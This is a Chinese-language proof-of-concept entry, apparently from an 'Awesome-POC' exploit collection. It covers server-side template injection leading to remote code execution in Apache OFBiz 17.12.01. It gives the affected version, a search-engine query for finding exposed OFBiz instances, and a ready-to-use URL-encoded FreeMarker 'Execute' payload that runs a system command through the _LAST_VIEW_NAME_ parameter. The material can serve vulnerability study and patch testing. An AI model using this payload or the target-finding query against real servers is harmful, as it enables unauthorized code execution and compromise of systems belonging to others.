Awesome-POC/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md
2024-11-06 14:10:36 +08:00

34 lines
843 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache OfBiz 服务器端模板注入 SSTI
## 漏洞描述
Apache OfBiz 17.12.01 容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
## 漏洞影响
```
Apache OfBiz 17.12.01
```
## 网络测绘
```
app="Apache_OFBiz"
```
## 漏洞复现
服务器端模板注入 renderLookupField
从不可信数据流 request.getParameter("`_LAST_VIEW_NAME_`") 给一个 FreeMarker 的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
poc
```
https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
```